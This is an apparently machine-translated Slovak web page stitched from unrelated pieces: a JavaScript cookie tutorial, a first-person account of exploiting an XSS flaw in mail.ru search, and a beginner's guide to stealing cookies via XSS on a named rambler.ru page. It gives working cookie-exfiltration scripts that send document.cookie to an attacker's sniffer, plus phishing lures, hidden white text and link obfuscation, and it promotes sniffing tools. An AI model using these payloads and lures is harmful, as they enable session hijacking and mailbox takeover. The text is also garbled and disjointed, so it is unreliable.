Spôsoby kradnutia cookies. Ako získať heslo zo súboru cookie Na čo slúžia?

JavaScript umožňuje nastaviť a čítať súbory cookie v prehliadači. V tejto lekcii sa pozrieme na to, ako pracovať s cookies, a tiež si vytvoríme jednoduchú stránku, ktorá si zapamätá zadané meno a zobrazí ho pri každom prihlásení.

Čo sú cookies?

Súbory cookie sú malé množstvo údajov, ktoré ukladá webový prehliadač. Umožňujú vám uložiť určité informácie o používateľovi a získať ich vždy, keď navštívi vašu stránku. Každý používateľ má svoj vlastný jedinečný súbor cookies.

Súbory cookie zvyčajne používa webový server na vykonávanie funkcií, ako je sledovanie návštev stránky, registrácia na stránke a ukladanie informácií o objednávkach alebo nákupoch. Na používanie cookies však nemusíme vymýšľať program webového servera. Môžeme ich použiť pomocou JavaScriptu.

Vlastnosť document.cookie.

V JavaScripte sa k súborom cookie pristupuje pomocou vlastnosti cookie objektu dokumentu. Súbory cookie môžete vytvárať nasledovne:

A získajte celú uloženú sadu súborov cookie takto:

Var x = document.cookie;

Pozrime sa na ukladanie a načítanie súborov cookie podrobnejšie.

Ukladanie cookies

Ak chcete uložiť súbor cookie, musíme priradiť document.cookie k textovému reťazcu, ktorý obsahuje vlastnosti súboru cookie, ktorý chceme vytvoriť:

document.cookie = " meno = hodnota; expiruje = dátum; cesta = cesta; doména = doména; zabezpečené";

Vlastnosti sú popísané v tabuľke:

Príklad popisu vlastnosti

meno = hodnota	Nastaví názov súboru cookie a jeho hodnotu.	užívateľské meno=Vasya
expiruje= dátum	Nastavuje dátum vypršania platnosti súborov cookie. Dátum musí byť vo formáte, ktorý vracia metóda toGMTString() objektu Date. Ak nie je zadaná doba platnosti, súbor cookie sa po zatvorení prehliadača vymaže.	vyprší = 13/06/2003 00:00:00
cesta = cesta	Táto možnosť nastavuje cestu na stránke, v rámci ktorej je súbor cookie platný. Hodnotu súboru cookie môžu získať iba dokumenty zo zadanej cesty. Zvyčajne sa táto vlastnosť ponechá prázdna, čo znamená, že k nej má prístup iba dokument, ktorý nastavil súbor cookie.	cesta=/demo/
doména=doména	Táto možnosť nastavuje doménu, v rámci ktorej súbor cookie funguje. Hodnotu súboru cookie môžu prijať iba stránky zo zadanej domény. Táto vlastnosť sa zvyčajne ponechá prázdna, čo znamená, že k nej má prístup iba doména, ktorá nastavila súbor cookie.	doména=webová stránka
zabezpečiť	Táto možnosť hovorí prehliadaču, aby použil SSL na odosielanie súborov cookie na server. Veľmi málo používané.	zabezpečiť

Pozrime sa na príklad nastavenia súborov cookie:

document.cookie = "username=Vasya; expires=02/15/2011 00:00:00";

Tento kód nastaví súbor cookie používateľského mena a priradí mu hodnotu „Vasya“, ktorá bude uložená do 15. februára 2011 (používa sa európsky formát času!).

var cookie_date = new Date(2003, 01, 15); document.cookie = "username=Vasya; expires=" + cookie_date.toGMTString();

Tento kód robí presne to isté ako predchádzajúci príklad, ale na nastavenie dátumu používa metódu Date.toGMTString(). Upozorňujeme, že číslovanie mesiacov v objekte Date začína od 0, to znamená, že február je 01.

Document.cookie = "prihlásené_prihlásené=áno";

Tento kód nastaví súbor cookie login_in a nastaví ho na „áno“. Keďže atribút expires nie je nastavený, súbor cookie sa po zatvorení prehliadača vymaže.

var cookie_date = new Date(); // Aktuálny dátum a čas cookie_date.setTime (cookie_date.getTime() - 1); document.cookie = "prihlásený_v=; expires=" + cookie_date.toGMTString();

Tento kód nastaví súbor cookie login_in a nastaví reťazec uloženia na čas jednu sekundu pred aktuálnym časom – táto operácia súbor cookie okamžite vymaže. Manuálny spôsob vymazania cookies!

Prekódovanie hodnoty súboru cookie!

Hodnota súboru cookie by sa mala prekódovať, aby sa správne ukladali a zobrazovali znaky, ako je medzera a dvojbodka. Táto operácia zaisťuje, že prehliadač správne interpretuje hodnotu. Prekódovanie Lega sa vykonáva pomocou funkcie JavaScript escape(). Napríklad:

document.cookie = "username=" + escape("Vasya Pupkin") + "; expires=02/15/2003 00:00:00"; Funkcia pre nastavenie cookies

Nastavenie súborov cookie bude jednoduchšie, ak napíšeme špeciálnu funkciu, ktorá bude vykonávať jednoduché operácie, ako je prekódovanie hodnôt a vytvorenie reťazca document.cookie. Napríklad:

Funkcia set_cookie (názov, hodnota, exp_y, exp_m, exp_d, cesta, doména, zabezpečenie) ( var cookie_string = názov + "=" + escape (hodnota); if (exp_y) ( var expires = nový dátum (exp_y, exp_m, exp_d) ); cookie_string += "; expires=" + expires.toGMTString( ) if (cesta) cookie_string += "; cesta=" + escape (cesta) cookie_string += "; doména=" + escape); (doména if (secure) cookie_string += "; secure"; document.cookie = cookie_string )

Funkcia berie dáta cookie ako argumenty, potom vytvorí príslušný reťazec a nastaví cookie.

Napríklad nastavenie súborov cookie bez dátumu vypršania platnosti:

set_cookie("používateľské meno", "Vasya Pupkin"); set_cookie ("používateľské meno", "Vasya Pupkin", 2011, 01, 15);

Nastavenie súborov cookie s dobou uloženia, doménou lokality, pomocou SSL, ale bez cesty:

set_cookie ("používateľské meno", "Vasya Pupkin", 2003, 01, 15, "", "stránka", "zabezpečené"); Funkcia na mazanie cookies.

Ďalšia užitočná funkcia pre prácu s cookies je uvedená nižšie. Funkcia „vymaže“ súbory cookie z prehliadača nastavením dátumu vypršania platnosti o jednu sekundu skôr, ako je aktuálna časová hodnota.

function delete_cookie (cookie_name) ( var cookie_date = new Date (); // Aktuálny dátum a čas cookie_date.setTime (cookie_date.getTime() - 1); document.cookie = cookie_name += "=; expires=" + cookie_date.toGMTString ();

Ak chcete použiť túto funkciu, musíte jej zadať iba názov súboru cookie, ktorý sa má odstrániť:

Delete_cookie("používateľské meno");

Získanie hodnoty súboru cookie

Ak chcete získať hodnotu vopred nastaveného súboru cookie pre aktuálny dokument, musíte použiť vlastnosť document.cookie:

Var x = document.cookie;

Toto vráti reťazec, ktorý pozostáva zo zoznamu párov názov/hodnota oddelených bodkočiarkou pre každý cookies, ktoré sú platné pre aktuálny dokument. Napríklad:

"username=Vasya; password=abc123"

V tomto príklade sú prednastavené 2 súbory cookie: používateľské meno, ktoré má hodnotu „Vasya“ a heslo, ktoré má hodnotu „abc123“.

Funkcia na získanie hodnoty súboru cookie

Zvyčajne potrebujeme naraz iba hodnotu jedného súboru cookie. Preto nie je vhodné použiť reťazec cookie! Tu je funkcia, ktorá spracováva reťazec document.cookies a vracia iba súbory cookie, ktoré sú v určitom okamihu zaujímavé:

Funkcia get_cookie (názov_cookie) ( var results = document.cookie.match ("(^|;) ?" + názov_cookie + "=([^;]*)(;|$)"); if (results) return (unescape (výsledky) inak návrat null)

Táto funkcia používa regulárny výraz na nájdenie názvu súboru cookie, ktorý je predmetom záujmu, a potom vráti hodnotu, ktorú spracuje funkcia unescape() na opätovné zakódovanie do normálneho znakového tvaru. (Ak sa súbor cookie nenájde, vráti sa hodnota null.)

Táto funkcia sa ľahko používa. Ak chcete napríklad vrátiť hodnotu súboru cookie používateľského mena:

Var x = get_cookie("používateľské meno");

Jednoduchý príklad použitia

V tomto príklade sme vytvorili stránku, ktorá pri vašej prvej návšteve požaduje vaše meno, potom uloží vaše meno do súboru cookie a zobrazí ho pri ďalších návštevách.

Otvorte stránku v novom okne. Pri prvej návšteve vás požiada, aby ste zadali svoje meno a uložili ho do súboru cookie. Ak stránku navštívite znova, na obrazovke sa zobrazí názov súboru cookie, ktorý ste zadali.

Pre súbory cookie nastavujeme dobu uchovávania na 1 rok od aktuálneho dátumu, to znamená, že prehliadač uloží vaše meno, aj keď ho zatvoríte.

Kód stránky môžete zobraziť vo svojom prehliadači výberom možnosti Zobraziť zdroj. Tu je hlavná časť kódu:

if (! get_cookie ("username")) ( var username = prompt ("Zadajte svoje meno", ""); if (username) ( var current_date = nový dátum; var cookie_year = current_date.getFullYear () + 1; var cookie_month = aktuálny_dátum.getMonth(); var cookie_day = aktuálny_dátum.getDate(); set_cookie("používateľské meno", používateľské meno, rok_cookie, mesiac_cookie, deň_súboru cookie) ) else( var používateľské meno = get_cookie("používateľské meno"); document.write ("Dobrý deň"); , " + užívateľské meno + ", vitajte na stránke!"); document.write("
Zabudni na mňa!"); }

Táto lekcia vám ukázala, ako používať súbory cookie v jazyku JavaScript na ukladanie informácií o vašich návštevníkoch. Ďakujem za tvoju pozornosť! :)

V rámci ktorého bola navrhnutá účasť na bezplatnom podujatí venovanom otázkam informačnej bezpečnosti. Keďže sa podujatie konalo v mojom meste, rozhodol som sa, že tam určite musím ísť. Prvá lekcia bola venovaná zraniteľnostiam na weboch ako XSS. Po lekcii som sa rozhodol, že potrebujem upevniť nadobudnuté vedomosti v reálnych podmienkach. Vybral som si niekoľko stránok, ktoré sa týkajú môjho mesta a začal som skúšať vkladať svoj skript do všetkých foriem. Vo väčšine prípadov bol skript odfiltrovaný. Stalo sa však, že sa spustilo „upozornenie“ a objavila sa moja správa. Nájdenú zraniteľnosť som nahlásil administrátorom a tí rýchlo všetko opravili.

V jeden z týchto dní ma pri kontrole poslednej pošty na mail.ru zaujal formulár na vyhľadávanie listov v poštovej schránke. Občas som použil toto vyhľadávanie, aby som našiel niečo, čo som potreboval v hromade mojich starých listov. No keďže som za posledných pár dní vložil svoje “upozornenie” takmer všade, kde sa dalo, moja ruka reflexívne siahla po tomto vyhľadávacom formulári. Napísal som kód pre môj skript a stlačil Enter. Predstavte si moje prekvapenie, keď som na obrazovke uvidel bolestne známu správu...

Na prednáške Open InfoSec Days prednášajúci povedal, že programátori sú dosť skeptickí voči zraniteľnostiam tohto druhu a povedali „alert? No a čo? Toto nie je nebezpečné." Ak som sa na iných stránkach uspokojil iba s týmto oknom s mojou správou, tak v tomto prípade som sa rozhodol ísť ďalej a ukázať, čo z takéhoto „upozornenia“ môže vzniknúť.

Skript teda funguje, čo znamená, že existuje zraniteľnosť. Preto môžete skúsiť spustiť nejaký iný skript. Napríklad skript, ktorý nám posiela cookies iného používateľa. Aby skript fungoval, musíme prinútiť používateľa, aby náš skript vykonal. Dá sa to urobiť tak, že mu pošlete list s príslušným odkazom, po kliknutí na ktorý sa vyhľadá poštová schránka a vykoná sa potrebný kód.

Pochopenie mechanizmu zraniteľnosti si vyžiadalo nejaký čas a veľa experimentov. Niekedy scenár fungoval, niekedy bol odfiltrovaný. Po určitom úsilí sa empiricky zistilo, že skript funguje na 100% iba vtedy, ak vyhľadávanie písmen dáva pozitívny výsledok. To znamená, že keď používateľ vykoná vyhľadávanie pomocou nášho skriptu, je potrebné, aby sa v jeho schránke našiel aspoň jeden list podľa daných parametrov. Nie je ťažké to zariadiť.

Namiesto „upozornenia“ tiež potrebujeme skript, ktorý prenesie súbory cookie do nášho sniffera. Tento skript napíšeme do samostatného súboru a načítame ho do nášho vyhľadávania. Vytvoril som súbor test.js s potrebným kódom a nahral ho na hosting. Kód skriptu je takýto:

Img=nový obrázok();
img.src="http://sitename.ru/sniff.php?cookie="+document.cookie;
funkcia F() (
location="http://www.solife.ru";
}
setTimeout(F, 5000);

Čo by som tu chcel objasniť. Vžite sa do kože útočníka. Potrebujeme, aby používateľ klikol na odkaz. Ako ho môžem prinútiť, aby to urobil? Môžete sľúbiť hory zlata a ak ich chcete získať, musíte sledovať náš odkaz na stránku. Ale myslím, že to nebude fungovať. Ľudia to už nenapadnú (ja sám takéto písmená neustále vymazávam bez toho, aby som si ich prečítal). Preto sa budeme hrať na ľudskú ľútosť, keďže v prírode stále existuje. Žiadame vás, aby ste na stránke hlasovali za záchranu ohrozených zvierat. Najprv vezmeme súbory cookie a potom používateľa presmerujeme na stránku s hlasovaním. Časový limit pre presmerovanie bol nastavený na 5 sekúnd, inak sa cookies jednoducho nestihli preniesť do sniffera a používateľ bol okamžite presmerovaný na stránku o zvieratách. Namiesto „upozornenia“ som použil nasledujúci skript:

Keď som skončil so scenármi, začal som písať list. Napadlo ma niečo takéto:


Dopadlo to dosť cynicky, no snažil som sa podmienky čo najviac priblížiť realite. Na konci listu je riadok s písmom, to preto, aby sa náš list našiel, keď budeme hľadať. Aby linka nevyvolávala zbytočné otázky, natrela som ju bielou farbou. Do slova „http“ som dal aj medzeru, aby sa reťazec nerozpoznal a nepremenil na odkaz. V opačnom prípade, aj keď je riadok skriptu napísaný bielym písmom, príjemca by odkaz zvýraznil modrou farbou, a to nepotrebujeme. Inteligentné vyhľadávanie tento reťazec napriek medzerám stále nájde a rozpozná.

E.mail.ru/cgi-bin/gosearch?q_folder=0&q_query=%27%3E%3Cscript%20src%3D%27http%3A%2F%2Fsitename.ru%2Ftest.js%27%3E%3C%2Fscript%3E

Použil som kódovanie URL pre skript, aby sa nič neodfiltrovalo. Pridal som aj parameter „q_folder=0“ pre vyhľadávanie, takže vyhľadávanie prebieha v priečinku „Inbox“.

List je pripravený, posielame ho. Použil som svoju druhú poštovú schránku v rovnakej službe ako príjemca. Pozrime sa, čo prišlo do druhej krabice.

Text nášho skriptu nie je viditeľný, pretože splýva s pozadím. Kliknime na odkaz a uvidíme, čo sa stane. Používateľ sa presunie do výsledkov vyhľadávania e-mailov na základe parametra, ktorý sme zadali. Náš list, ktorý sme poslali, je viditeľný vo výsledkoch vyhľadávania. V súčasnosti už náš skript funguje a odoslal súbory cookie používateľa snifferovi. Po 5 sekundách (čas závisí od nastavenia skriptu) je používateľ presmerovaný na stránku s hlasovaním.

Skontrolujem svoj súbor sniff.txt:

Keďže mojím cieľom nie je kradnúť schránky iných ľudí alebo k nim získať prístup, tu príbeh ukončím. Teoreticky však môžete svoje súbory cookie nahradiť súbormi cookie niekoho iného a získať prístup k poštovej schránke niekoho iného. Vo všeobecnosti, ak útočník zameria svoj cieľ na cieľ, nájde využitie pre informácie, ktoré dostane.

Chcel by som poďakovať Sergejovi Belovovi (

Môj priateľ zabudol heslo na jednu stránku. Predtým však pri prihlasovaní zaškrtol v prehliadači Google Chrome zaškrtávacie políčko „Zapamätať si ma“, čo mu umožnilo pristupovať na stránku pod svojím účtom. Dostal som otázku, či je možné tento magický stav preniesť na iný počítač. Správnejšie by bolo, samozrejme, zmeniť alebo obnoviť heslo, ale môj priateľ to nemohol urobiť z dôvodov nesúvisiacich s prípadom.

Ako používať intercepter-ng pre figuríny

Napriek rôznorodosti moderného softvéru na výber je ťažké nájsť lepšie hackerské programy pre Android ako intercepter ng. Prvým kritériom v prospech tohto produktu je jeho skutočný výkon. Väčšina snifferov ponúkaných v sieti sú len napodobeniny, ktoré neplnia svoje uvedené funkcie.

Ďalšími pozitívnymi faktormi sú všestrannosť aplikácie a pokrytie širokého okruhu používateľov.

Počítačová pomoc 939-29-71

Začnime po poriadku. Cookies alebo "cookies" sú veľmi malé textové súbory - záložky s informáciami.

Webový server odošle tieto informácie do prehliadača používateľa. kde sú tieto informácie uložené, kým nebudú potrebné. Nie celkom jasné. Dobre. Dobre.

Pokúsim sa to urobiť ešte jednoduchšie. Pozri. ste sa zaregistrovali na akejkoľvek webovej stránke.

V čase registrácie sa vytvárajú rovnaké „cookies“.

Takí sú.

Cookie Cadger

Program počúva prevádzku v sieti WiFi, zachytáva súbory cookie a replikuje reláciu používateľa vo vašom prehliadači, pričom opakuje požiadavky s jeho prihlasovacími údajmi. Autor Matthew Sullivan predstavil program 30. septembra na hackerskej konferencii Derbycon. Matthew Sullivan priamo počas prejavu zachytil cez WiFi nezabezpečenú reláciu s Google jedného z návštevníkov konferencie.

Ako ukradnúť cookies

Ak na webovej stránke zadáte do panela s adresou svojho prehliadača Firefox alebo Opera nasledujúci text: javaсript:document.write(document.cookie); potom uvidíte niečo ako: remixAdminsBar=0; remixGroupType=0; remixpass=******************; remixwall=0; remixInformation=0; remixMembersBar=0; remixdescription=0; remixautobookmark=8; remixemail=********; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0 Pozor! .

Kompletný sprievodca skriptovaním medzi stránkami

XSS je typ softvérovej zraniteľnosti natívny pre webové aplikácie, ktorý umožňuje útočníkovi vložiť skript na strane klienta do webových stránok, ktoré si prezerajú iní používatelia, Wikipedia definuje XSS takto: „Skriptovanie medzi stránkami (XSS) je typ natívnej softvérovej zraniteľnosti. na web -aplikácie (vynechaním bezpečnostných obmedzení prehliadača), čo umožňuje útočníkovi vložiť klientsky skript do webových stránok, ktoré si prezerajú iní používatelia.

Rozdiel medzi súbormi cookie a reláciami

Nie je to tak dávno, čo som napísal článok o tom, ako zaregistrovať a autorizovať používateľov na webovej stránke.

". V tomto článku rozoberiem rozdiel medzi reláciami a súbormi cookie. aby ste si konečne mohli vybrať.

Cookies. Nie, vôbec nejde o cookies, ale o vašu bezpečnosť. Takže prejdete na svoju obľúbenú stránku „vkontakte“ (alebo si napríklad pozriete poštu) na počítači niekoho iného, ​​odmietnete možnosť „uložiť heslo“, šťastne si prezriete poštu a odídete. A nemyslite na to, že sa teraz môžete prihlásiť do sociálnej siete alebo e-mailu pod svojím menom.

Situáciu s programom, ktorý si zapamätá heslo bez vášho vedomia, ani neuvažujem. Toto už je premyslený hack a zrejme tušíte, že sa niečo také môže stať a na takom počítači nepôjdete na svoju obľúbenú stránku. Môžeme však hovoriť o jednoduchej ľudskej zvedavosti - boli ste na návšteve u priateľov a potom zrazu dostanú príležitosť prečítať si vašu poštu. Ste si istý, že túto príležitosť odmietnu? Nebojíš sa, že ti niečo vyjde? V každom prípade odložím otázky morálky a budem hovoriť len o tom, ako sa v počítači ukladajú informácie, ktoré vám teraz môžu pustiť na nejakú stránku bez toho, aby ste si pýtali heslo.

ako ukradnúť cookie

A názov tejto technológie je cookies.

A tu sa to všetko začalo. Protokol http, cez ktorý si skutočne prezeráte stránky (vrátane tejto), spočiatku neposkytoval možnosť udržiavania spojenia. To znamená, že zhruba odošlete požiadavku na stránku, dostanete odpoveď, zobrazí sa na obrazovke a server si o vás nič nepamätá. To je, samozrejme, dobré, keď je stránka čisto informačná a nemala by si o vás nič pamätať, ale žijeme v dobe Webu 2.0 😉 Prirodzeným vývojom protokolu sú požiadavky POST a GET, keď odošlete nejaké údaje, server ich môže zapísať do údajov databázy, ale to nestačí.

Pozrime sa na veľmi jednoduchý príklad. fórum. Tak ste sa zaregistrovali a na fóre je príspevok, že existuje taký a taký používateľ s takým a takým heslom a nejakými ďalšími dodatočnými údajmi. Teraz však prejdete na fórum a prihlásite sa - zadajte svoje heslo. Niekde by mala byť informácia, že ste prihlásený. Na serveri? Samozrejme, že nie! Na serveri nie je možné uložiť informáciu o tom, že autorizácia bola vykonaná z vášho počítača – nebude vás schopný rozlíšiť od niekoho iného (dokonca ani vaša IP adresa vás jednoznačne neidentifikuje)! Preto informácie o tom, že došlo k autorizácii, musia byť uložené vo vašom počítači. Na to sú cookies, na to boli vytvorené.

Súbor cookie je malý záznam vo vašom počítači, ktorý ukladá informácie o stránke, ktorú ste navštívili. Keď sa prihlásite, vytvorí sa podobný záznam, po ktorom sa môžete prechádzať po fóre a ono vás rozpozná. To sa však už stane automaticky - vďaka informáciám uloženým v súbore cookie - takže predstieranie, že ste hlavným administrátorom fóra, nebude fungovať bez kontroly hesla.

Teraz sa môžeme vrátiť tam, kde tento článok začal. Ak ste sa niekde prihlásili bez uloženia hesla, môže sa stať, že na počítači bol vytvorený záznam, ktorý vám teraz umožňuje neoprávnené prihlásenie do tohto zdroja pod vaším menom. Takýto záznam sám o sebe bude po určitom čase zastaraný, ale môžete si ho vynútiť. Každý prehliadač to robí inak, ukážem vám, ako sa to dá urobiť v mojom obľúbenom prehliadači Google Chrome. Otvorenie parametrov

Prejdite na kartu „pokročilé“ a nájdite tlačidlo „zobraziť súbory cookie“.

Teraz, samozrejme, môžete vymazať všetky súbory cookie, ale môže to rozrušiť vlastníka počítača. Preto napríklad do horného poľa môžete zadať názov stránky, o ktorú máte záujem

Potom môžete vymazať iba súbory cookie súvisiace s touto stránkou. Môžete to skúsiť na mojom. Ak sa však prihlásite do môjho fóra a potom vymažete súbory cookie, prihlasovacie údaje sa zabudnú. Skús to!

komentáre powered by

1.Čo je XSS?
Chyba XSS umožňuje vloženie ľubovoľného kódu javascript do tela stránky. XSS útok sa líši od ostatných (napríklad SQL injection alebo PHP injection) tým, že ovplyvňuje klienta, nie server.

ako ukradnúť cookies

S jeho pomocou nemôžete prezerať databázové tabuľky, načítať shell atď. Najbežnejším využitím XSS je kradnutie cookies.
Cookies sú malé údaje vytvorené webovým serverom a uložené v počítači používateľa ako súbor. Súbory cookie sa zvyčajne používajú na ukladanie účtov a najčastejšie obsahujú zašifrované heslo, prihlasovacie meno a ID relácie (aj keď nie vždy)
XSS prichádza v dvoch typoch, aktívny a pasívny.

Pasívny XSS vyžaduje priamu interakciu zo strany obete, napríklad kliknutie na odkaz obsahujúci kód JavaScript. Pri používaní tohto typu XSS sa nezaobídete bez SI (sociálne inžinierstvo)

Aktívny XSS nevyžaduje od obete žiadnu účasť; všetko, čo musí urobiť, je navštíviť stránku obsahujúcu XSS. Aktívne XSS môže byť napríklad v správach na fórach, chatoch, pridávaní noviniek atď.

2.Vyhľadajte XSS
V tomto odseku vám poviem, ako nájsť xss

2.1.Pasívne XSS
Ak chcete nájsť pasívne XSS, stačí do vstupného formulára nahradiť alert('xss'), ak skript fungoval a zobrazí sa hlásenie "xss", potom je chyba prítomná, ak skript nefungoval, môžete tiež skúsiť ">alert (), toto je pravdepodobne najčastejšia zraniteľnosť xss Ak nefungoval ani jeden, ani druhý skript, potom s najväčšou pravdepodobnosťou neexistuje žiadna zraniteľnosť.
Pozrime sa na príklad.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
Vidíte formulár „vyhľadávanie“? tam vložte ">alert()" a kliknite na "nájsť"
Zobrazí sa okno s xss, čo znamená, že xss je prítomné (možno v čase, keď si prečítate tento článok, bude toto xss už odstránené)

2.2.Aktívny XSS
Takéto css môžu byť napríklad v profilových poliach, pri pridávaní noviniek v názve novinky a v správach samotných (menej často), v správach na fórach/chatovacích miestnostiach/izbách pre hostí so zapnutým html. Všetko je tu jednoduché, do polí zadáme skript z predchádzajúceho pododseku a ak sa správa zobrazí na obrazovke, zraniteľnosť je prítomná.
Pozrime sa na xss v BB tagoch ​​na fórach.
Môžete skúsiť jednoducho vložiť kód javascript do značky, napríklad takto:
javascript:alert('xss')
Niektoré značky majú parametre, napríklad značka má parametre dynsrc a lowsrc, skúsme nahradiť kód takto:
http://www.site.ru/image.jpg dynsrc=javascript:alert(‘xss’)
Ak skript fungoval, xss je tam

3.Používanie XSS na ukradnutie súborov cookie
Teraz najchutnejšie))))
Na ukradnutie cookies potrebujeme webový sniffer, môžete si nainštalovať nejaký sniffer na svoj hosting, alebo môžete použiť online sniffer, ktorých je teraz veľa.
Aby obeť ukradla súbory cookie prostredníctvom pasívneho XSS, musí nasledovať jedovatý odkaz. Na ukradnutie súborov cookie použijeme namiesto upozornenia ('xss') iný skript:
img = nový obrázok ();


nahradíme skript do odkazu a necháme obeť, aby ho nasledovala, pozrela sa na záznam sniffer a radovala sa.
Pozrime sa na príklad.
Zoberme si ten XSS na Rambleri z predchádzajúceho odseku.
Vložíme
">
img = nový obrázok ();
img.src = "adresa obrázka snímania"+document.cookie;

vo vyhľadávacom formulári kliknite na „nájsť“, pozrite sa na panel s adresou a pozrite si:

http://miss.rambler.ru/srch/?sort=0& … &words =">
Tento odkaz posielame obeti a užívame si cookies.
Keď obeť vidí takýto odkaz, môže niečo tušiť, preto je vhodné kódovať
">img = new Image();img.src = "adresa obrázka snímania"+document.cookie;
v URL Alebo použite služby ako http://tinyurl.com/
Prejdime k aktívnemu XSS, tu je všetko jednoduché, namiesto alert() vložíme img = new Image();img.src = "adresa obrázku sniffer"+document.cookie;

Teraz máme cookies. Ale čo s nimi robiť? Je to jednoduché, musíte ich nahradiť vlastnými. Prehliadač Opera má vstavaný editor súborov cookie (nástroje->pokročilé->správa súborov cookie), existuje plugin pre Firefox (nepamätám si, ako sa volá, použite Google)
To je zatiaľ všetko, možno bude článok doplnený

Opera otvorte hlavnú ponuku, prejdite do časti „Nastavenia“ a vyberte riadok „Všeobecné nastavenia...“. Alebo môžete jednoducho stlačiť klávesové skratky CTRL + F12. Tým sa otvorí okno nastavení prehliadača, kde na karte „Rozšírené“ musíte kliknúť na sekciu „Cookies“ v ľavom paneli. V ňom musíte kliknúť na tlačidlo „Spravovať súbory cookie“.

V prehliadači Mozilla FireFox otvorte časť „Nástroje“ v ponuke a vyberte „Nastavenia“. V okne nastavení musíte prejsť na kartu „Ochrana osobných údajov“, nájsť tam tlačidlo „Zobraziť súbory cookie...“ a kliknutím naň prejsť na zoznam súborov cookie uložených prehliadačom. Tu ich môžete vyhľadať a zobraziť.

V programe Internet Explorer rozbaľte časť „Nástroje“ v ponuke a vyberte „Vlastnosti“. V okne nastavení vlastností prejdite na kartu „Všeobecné“ a kliknite na tlačidlo „Možnosti“ v časti „História prehliadania“. Týmto spôsobom otvoríte ďalšie okno („Možnosti dočasných súborov“), v ktorom musíte kliknúť na tlačidlo „Zobraziť súbory“.

Kliknite na nadpis "Názov" v zozname obsahu priečinka na ukladanie dočasných súborov programu Internet Explorer, ktorý sa otvorí - týmto spôsobom môžete zoskupiť všetky súbory cookie do jedného bloku v spoločnej hromade heterogénnych súborov. Tu môžete nájsť súbor, ktorý vás zaujíma, a otvoriť ho v štandardnom programe Poznámkový blok na prezeranie alebo úpravu.

V prehliadači Google Chrome kliknite na ikonu kľúča v pravom hornom rohu okna a z ponuky vyberte položku Možnosti. Prehliadač otvorí stránku „Nastavenia“ a vy kliknite na odkaz „Rozšírené“ na jeho ľavom paneli a na stránke rozšírených nastavení kliknite na tlačidlo „Nastavenia obsahu“. Toto nie je posledná stránka na ceste k súborom cookie uloženým týmto prehliadačom.

Kliknite na tlačidlo „Všetky súbory cookie a údaje stránok“ na ďalšej stránke a konečne budete mať prístup k zoznamu súborov cookie.

Prehliadač Google Chrome poskytuje možnosť vyhľadávať, zobrazovať a odstraňovať súbory cookie.

V prehliadači Safari kliknite na ikonu ozubeného kolieska v pravom hornom rohu a vyberte „Nastavenia...“. V okne na zmenu nastavení musíte prejsť na kartu „Zabezpečenie“ a kliknúť na tlačidlo „Zobraziť súbory cookie“. Safari poskytuje iba funkcie na vyhľadávanie a mazanie súborov cookie, obsah týchto dočasných súborov je tu viditeľný len čiastočne.

Cookies- informácie vo forme textového súboru uloženého webovou stránkou v počítači používateľa. Obsahuje autentifikačné údaje (login/heslo, ID, telefónne číslo, adresa schránky), užívateľské nastavenia, stav prístupu. Uložené v profile prehliadača.

Hackovanie cookies je krádež (alebo „únos“) relácie návštevníka webového zdroja. Súkromné ​​informácie sa sprístupnia nielen odosielateľovi a príjemcovi, ale aj tretej strane – osobe, ktorá odpočúvanie vykonala.

Nástroje a techniky na hackovanie súborov cookie

Počítačoví zlodeji, podobne ako ich kolegovia v reálnom živote, okrem zručností, šikovnosti a vedomostí, samozrejme, majú aj vlastné nástroje – akýsi arzenál hlavných kľúčov a sond. Poďme sa pozrieť na najobľúbenejšie triky, ktoré hackeri používajú na extrakciu cookies od používateľov internetu.

Snifferi

Špeciálne programy na monitorovanie a analýzu sieťovej prevádzky. Ich názov pochádza z anglického slovesa „sniff“ (sniff), pretože. doslova „vyňuchať“ prenášané pakety medzi uzlami.

Útočníci však používajú sniffer na zachytenie údajov relácie, správ a iných dôverných informácií. Cieľom ich útokov sú najmä nechránené siete, kde sa cookies odosielajú v otvorenej HTTP relácii, teda prakticky nie sú šifrované. (Verejné Wi-Fi je v tomto smere najzraniteľnejšie.)

Na vloženie sniffera do internetového kanála medzi užívateľský uzol a webový server sa používajú nasledujúce metódy:

• „počúvanie“ sieťových rozhraní (rozbočovače, prepínače);
• vetvenie a kopírovanie prevádzky;
• pripojenie k medzere sieťového kanála;
• analýzu prostredníctvom špeciálnych útokov, ktoré presmerujú prevádzku obete na sniffer (spoofing MAC, spoofing IP).

Skratka XSS znamená Cross Site Scripting. Používa sa na útoky na webové stránky s cieľom ukradnúť používateľské údaje.

Princíp XSS je nasledovný:

• útočník vloží škodlivý kód (špeciálny skrytý skript) na webovú stránku webu, fóra alebo do správy (napríklad pri korešpondencii na sociálnej sieti);
• obeť prejde na infikovanú stránku a aktivuje nainštalovaný kód na svojom PC (klikne, nasleduje odkaz atď.);
• spustený škodlivý kód zase „extrahuje“ dôverné údaje používateľa z prehliadača (najmä súbory cookie) a odošle ich na webový server útočníka.

Aby hackeri „implantovali“ softvérový mechanizmus XSS, používajú najrôznejšie zraniteľnosti webových serverov, online služieb a prehliadačov.

Všetky zraniteľnosti XSS sú rozdelené do dvoch typov:

• Pasívne.Útok sa dosiahne vyžiadaním konkrétneho skriptu na webovej stránke. Škodlivý kód je možné vložiť do rôznych foriem na webovej stránke (napríklad do vyhľadávacieho panela lokality). Najcitlivejšie na pasívne XSS sú zdroje, ktoré nefiltrujú HTML tagy, keď prídu dáta;
• Aktívne. Nachádza sa priamo na serveri. A sú aktivované v prehliadači obete. Aktívne ich využívajú podvodníci vo všetkých druhoch blogov, chatov a spravodajských kanálov.

Hackeri starostlivo „kamuflujú“ svoje XSS skripty, aby obeť nič netušila. Zmenia príponu súboru, vydajú kód za obrázok, motivujú ich, aby nasledovali odkaz, a zaujmú zaujímavým obsahom. Výsledkom je, že používateľ počítača, ktorý nemôže ovládať svoju zvedavosť, vlastnou rukou (kliknutím myši) odošle súbory cookie relácie (s prihlasovacím menom a heslom!) autorovi skriptu XSS - počítačovému darebákovi.

Nahradenie súborov cookie

